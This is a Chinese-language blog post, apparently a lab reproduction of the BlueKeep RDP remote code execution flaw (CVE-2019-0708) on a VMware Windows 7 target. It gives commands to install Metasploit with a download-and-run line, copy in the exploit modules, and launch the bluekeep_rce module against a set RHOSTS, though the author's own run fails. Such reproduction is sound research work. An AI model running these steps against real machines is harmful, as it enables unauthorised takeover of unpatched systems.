CVE-2019-0708 Emersion

2019-09-08T03:41:39

CVE-2019-0708 Emersion

最近威胁度非常高的CVE-2019-0708(Remote Desktop Protocol)在前几日放出了疑似可用的exp,ATD安全团队第一时间进行了复现,发现exp可以使用,将此次事件等级定为严重威胁。

目前此exp只适用于Windows 7和Windows Server 2008 R2 x64。

漏洞详情

CVE-2019-0708,属于任意代码远程执行漏洞,当未经身份验证的攻击者使用RDP连接到目标系统并发送特制请求时,即可以触发该漏洞。此漏洞属于预身份验证,无需用户交互,成功利用此漏洞的攻击者可以安装应用程序,查看、更改或删除数据或创建具有完全用户权限的新账户。

漏洞利用

使用VMware安装Windows7 SP1模拟受害机,使用Kali 2019.1模拟攻击机。

复现环境

受害机:Windows7 SP1/Windows Server 2008R2

下载地址:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

安装Metasploit

如果你是用的是Kali,可以跳过这一步。

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

Exp

此Exp利用需要用到Metasploit框架,Exp作者已经Pull到Metasploit官方仓库,但是Metasploit官方还未合并,所以这里我们手动加入Exp。

Exp下载地址:点我下载

下载后件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)

rdp.rb -> /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb   ->   /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb   ->   /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb   ->   /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

不懂的话直接复制命令吧(仅限kali)

cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

攻击命令

使用msfconsole进入metasploit-framework
进入以后使用reload_all重新加载0708rdp利用模块
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP攻击模块
使用info查看工具相关信息以及设置

可见关键设置主要为RHOSTS\ RPORT \ target

使用set RHOSTS 受害机IP设置受害机IP
使用set RPORT 受害机PORT设置受害机RDP端口号
使用set target ID数字(可选为0-4)设置受害机机器架构
这里我们使用的是VMware,那么target 3满足条件
使用exploit开始攻击,等待建立连接

但是新的问题出现了,最后一步报错,但是可以验证目标服务器是有漏洞的。

看了一下在网上搜了一下,发现有人遇到了同样的问题,但是没有解决,猜测不能复现的问题可能是SSL版本问题,因为 Debian/Kali默认为TLSv1.2。

明天再看看吧。

当前页面是本站的「Baidu MIP」版。发表评论请点击:完整版 »